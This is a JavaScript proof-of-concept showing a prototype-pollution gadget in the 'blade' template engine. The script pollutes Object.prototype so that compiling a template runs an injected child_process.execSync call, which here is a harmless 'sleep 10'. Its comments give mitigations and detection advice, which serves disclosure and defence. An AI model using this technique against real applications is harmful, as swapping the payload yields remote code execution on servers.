// Proof-of-concept: a server-side prototype-pollution "gadget" in the `blade`
// template engine. The script itself is an ordinary read-compile-render flow;
// the only thing that makes it an exploit is the two writes to
// Object.prototype below, which stand in for what an unsafe merge/clone of
// attacker-controlled JSON would do in a real application.
const blade = require('blade');
const fs = require('fs');
const path = require('path');
// Simulated pollution. After these two lines EVERY object in the process,
// including the option/scope objects blade builds internally, inherits a
// `value` and an `output.to` property unless it defines its own.
// NOTE(review): the assumption is that blade's compiler reads `output.to`
// from an object it creates without own properties and splices the string
// into the generated template function verbatim — confirm against the blade
// source for the version under test.
// The template will be broken (presumably by the trailing `\nxxx`), but the
// injected expression in front of it is still executed when the template is
// compiled/run.
Object.prototype.value = "somevalue"
Object.prototype.output = {
to: "global.process.mainModule.require('child_process').execSync('sleep 10')\nxxx"
}
// Mitigation, for anyone reproducing this defensively: freeze
// Object.prototype at startup (`Object.freeze(Object.prototype)`), merge
// untrusted input only into null-prototype objects, and reject
// `__proto__`/`constructor`/`prototype` keys before any recursive merge.
// Detection: a sudden `sleep`/child process spawned from the template worker
// is the observable side effect of this particular payload.
// This template includes the `render` directive; the file is expected to exist
// next to this script under ./views (the leading '/' is harmless in path.join).
const mainFilePath = path.join(__dirname, '/views/functions_and_block.blade');
// Read the template source, compile it with debug output enabled, then render
// it with an empty locals object and print the resulting HTML. Every callback
// rethrows its error rather than swallowing it, so a failed compile is visible.
fs.readFile(mainFilePath, 'utf8', (err, mainFile) => {
if (err) throw err;
// `filename` is passed so blade can resolve includes/`render` relative to the
// template; `debug: true` keeps the generated code inspectable.
blade.compile(mainFile, { filename: mainFilePath, debug: true }, (err, tmpl) => {
if (err) throw err;
// `{}` is a plain object and therefore also inherits the polluted
// properties — the gadget does not depend on the caller's locals.
tmpl({}, function(err, html) {
if (err) throw err;
console.log(html);
});
});
});